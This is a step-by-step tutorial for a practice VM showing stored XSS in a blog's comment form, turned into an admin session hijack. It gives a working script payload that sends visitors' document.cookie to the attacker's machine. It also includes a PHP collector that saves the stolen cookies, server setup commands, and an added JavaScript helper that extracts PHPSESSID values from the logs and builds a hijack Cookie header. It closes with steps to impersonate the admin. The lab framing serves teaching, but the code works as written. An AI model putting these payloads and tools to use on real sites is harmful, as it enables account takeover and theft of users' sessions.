Stored XSS In "XSS and MySQL file"

Refer to the XSS - Cross Site Scripting guide, where I explain what XSS is and the types of XSS.


The first test is a plain alert box; the same stored injection is then turned into a cookie-stealing payload.

In this guide you will use the "XSS and MySQL file" VM for practice.

Open up your Kali machine and search for the VM IP using:

# netdiscover

In my case it's 10.0.2.7


(screenshot: netdiscover output)

This command scans your network for live hosts. It might take a while, so be patient.

Of course you could just log in to the VM (the target machine), if you have console access to it, and run:

# ip a

to find out its IP, but we want to treat our VM environment as a real target machine.

Open your web browser in your Kali machine and navigate to the IP you discovered. The target is a small blog ("My Blog").

If you click on the "Test" post you get a form for leaving a comment.

That's a good place to try and practice XSS.

Test the website for XSS by typing the following into the "Text" area:

<script>alert("XSS")</script>

Click "Submit Query" and you will see the XSS pop up:

(screenshot: the XSS alert popping up in the comment form)

Now every time you refresh the page it pops up again: the comment is saved in the database and rendered back unescaped to every visitor, which is what makes this a stored XSS rather than a reflected one.

Now I'm going to guide you on how to use this vulnerability to steal the admin's session cookie so you can get admin access to the website.

Save the following PHP code in any folder you like on your Kali machine; this is the collector that will receive the stolen cookie:

<?php
// The XSS payload sends the victim's document.cookie as the "test" query parameter.
// php -S already prints each request line (query string included) to the terminal;
// this additionally appends the value to cookies.txt next to the script.
$cookie = isset($_GET['test']) ? $_GET['test'] : '';
if ($cookie !== '') file_put_contents(__DIR__ . '/cookies.txt', $cookie . PHP_EOL, FILE_APPEND);
?>

Save it with a .php extension as "index.php".

The next stage is to run a PHP server in your Kali machine in the same location you saved your "index.php":

  1. Stop the Apache service so port 80 is free: # service apache2 stop

  2. Start the PHP built-in server on your IP and port 80 (capital S): # php -S <your_Kali_IP>:80

  3. Press Enter and leave the terminal open: php -S prints every request it receives, including the query string, which is where the stolen cookie will show up.

(Binding to port 80 needs root. To stop the server, hit Ctrl + C)

In the "My Blog" page, in the comments section, you are going to write a payload that calls your PHP script on the PHP server you just started.

This is the payload:

<script>location.href='http://10.0.2.4/index.php?test='+document.cookie;</script>

What this payload does: the inline script is stored with the comment, so it runs in the browser of everyone who views the comments. location.href sends that browser to your Kali server, with the victim's document.cookie appended as the "test" parameter of the request, which is exactly what index.php reads. Replace 10.0.2.4 with the IP you started the PHP server on.

When you click "Submit Query" your own browser executes the payload first, so you will see your Kali address in the URL bar:

The next step is to wait.
Everyone who views the comments will run the payload, and their cookies will arrive at your PHP server.

You are looking for the admin's cookie.

(To manage the comments the admin has to be logged in, and that login is tracked by the PHPSESSID session cookie. Stealing it does not give you the admin's username or password, but it lets you reuse the admin's authenticated session.)

(screenshot: stolen cookies arriving at the PHP server)

From the image above you can see the requests arriving at your PHP server, each carrying a session ID (in this case look at the last one).

  • Copy the PHPSESSID value.

  • Add a cookie-manager add-on to your browser (search for "Cookies manager" under add-ons); it lets you edit the cookies for any given website.

  • Open it and point it to the URL you are working on.

  • Change the PHPSESSID value to the one you copied >> Save >> close the manager >> refresh the website >> click on "Admin".

This works because the application's session cookie is not marked HttpOnly, so document.cookie can read it, and because the server identifies the admin's session by that value alone, so any browser presenting it is treated as the admin.
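The steps above are done by eye in the screenshot and with a browser add-on. The following is an added example, not from the original tutorial, that does the same thing on the collector side: it picks the PHPSESSID values out of php -S style request-log lines, keeps the most recent one as the tutorial suggests, and builds the Cookie header you would send to hijack the session. The log lines, addresses and session IDs are constructed for the example and only imitate php -S's terminal output.

```javascript
// Added example, not from the original tutorial. The log below is constructed
// in the style of php -S's terminal output; IPs, timestamps and IDs are made up.
const LOG = `
[Tue Mar 12 10:00:01 2024] 10.0.2.7:51234 [200]: GET /index.php?test=PHPSESSID%3D4b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e
[Tue Mar 12 10:00:09 2024] 10.0.2.7:51240 [404]: GET /favicon.ico
[Tue Mar 12 10:03:42 2024] 10.0.2.7:51302 [200]: GET /index.php?test=PHPSESSID=9f8e7d6c5b4a39281706f5e4d3c2b1a0
[Tue Mar 12 10:03:50 2024] 10.0.2.7:51310 [200]: GET /index.php?test=theme%3Ddark
`;

// Every "test" value delivered to the collector, URL-decoded, in log order.
// Raw and percent-encoded payload variants both end up as plain strings here.
function stolenValues(log) {
  const out = [];
  for (const line of log.split("\n")) {
    const m = line.match(/\bGET (\S+)/);
    if (!m) continue;
    // The request path is relative; any base origin works for parsing it.
    const value = new URL(m[1], "http://collector").searchParams.get("test");
    if (value !== null) out.push(value);
  }
  return out;
}

// Parse a document.cookie-style string ("a=1; b=2") into a name -> value map.
function parseCookieString(s) {
  const jar = {};
  for (const part of s.split(";")) {
    const i = part.indexOf("=");
    if (i === -1) continue;
    jar[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return jar;
}

// The tutorial says to take the last PHPSESSID seen (the most recent visitor).
// Returns null if no session ID was captured at all.
function latestSessionId(log) {
  let sid = null;
  for (const v of stolenValues(log)) {
    const jar = parseCookieString(v);
    if (jar.PHPSESSID) sid = jar.PHPSESSID;
  }
  return sid;
}

// The Cookie header to present to the target once the ID is known; this is
// what the browser cookie-manager step does for you.
function hijackCookieHeader(log) {
  const sid = latestSessionId(log);
  return sid ? `Cookie: PHPSESSID=${sid}` : null;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(stolenValues(LOG));
  console.log(hijackCookieHeader(LOG));
}
```

Note that a captured ID is only useful while the admin's session is alive; if the admin logs out or the session expires on the server, the value stops working and you have to wait for another visit.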

(screenshot: editing the PHPSESSID cookie in the cookie manager)

You are now logged in as the admin!

(screenshot: admin access gained via the stolen cookie)

All the guides, tips, and tricks on this website are for educational purposes only; the website owner is not accountable for any use of this information.